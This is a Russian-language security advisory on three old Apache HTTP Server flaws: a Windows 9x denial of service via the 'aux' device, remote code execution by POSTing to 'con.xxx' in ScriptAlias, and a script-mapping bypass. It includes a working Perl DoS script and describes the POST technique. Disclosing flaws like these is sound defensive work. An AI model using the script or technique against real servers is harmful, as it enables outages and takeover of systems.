Apache HTTP Server содержит несколько уязвимостей, связанных с выполнением подпрограмм, которые позволяют атакующему заставить Apache сервер неправильно обрабатывать файлы, что может привести к зависанию всей системы или удаленному
выполению произвольного кода.

1. Удаленный DoS

Уязвимость связанна с ошибочными регистрациями в функции ap_directory_walk и воздействует на Windows 9x системы, на которых выполняется Apache Web сервер. 

Отказ в обслуживании может быть вызван при запросе зарезервированного DOS устройства, типа
"aux": 

#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 1 || @ARGV > 2) {
print STDOUT «Usage: perl $0 <host> <port=80>»;
exit;
}
if (@ARGV == 2) {
$port = $ARGV[1];
} else {
$port = 80;
}
$f = IO::Socket::INET->new(Proto=>»tcp», PeerHost=>$ARGV[0], 
PeerPort=>$port);
print $f "GET /aux HTTP/1.0\r\n\r\n";

2. Удаленный root

Эксплуатация этой уязвимости позволяет удаленному атакующему получить root привилегии на уязвимой системе. Уязвимость затрагивает Windows 9x версии Apache сервера,
имеет ту же самую причину, что и предыдущая уязвимость. 

Когда данные передаются CGI сценарию (POST), stdin поток указывает на входные данные формы. Посылая POST к «con.xxx» в каталоге ScriptAlias, ваши POST данные будут выполнены CGI интерпретатором.

3. Обход заданного по умолчанию режима отображения сценариев

Эксплуатация этой уязвимости позволяет обойти заданный по умолчанию режим отображения сценариев. Уязвимость воздействует на Apache для всех платформ. Эта проблема лучше всего описывается примером:

http://localhost/folder.php/file

Apache должен анализировать ‘file’ как открытый текст — то есть просто возвратить его назад браузеру. Однако, неправильная проверка в алгоритме отображения Apache, свяжет ‘php’ расширение с этим запросом. Вместо того, чтобы проверить только расширение файла, Apache проверяет расширения в любом члене пути, останавливаясь на первом.

Уязвимость обнаружена в Apache 1.3.х ( до 1.3.27) и Apache 2.0.х (до 2.0.43).

Оставить мнение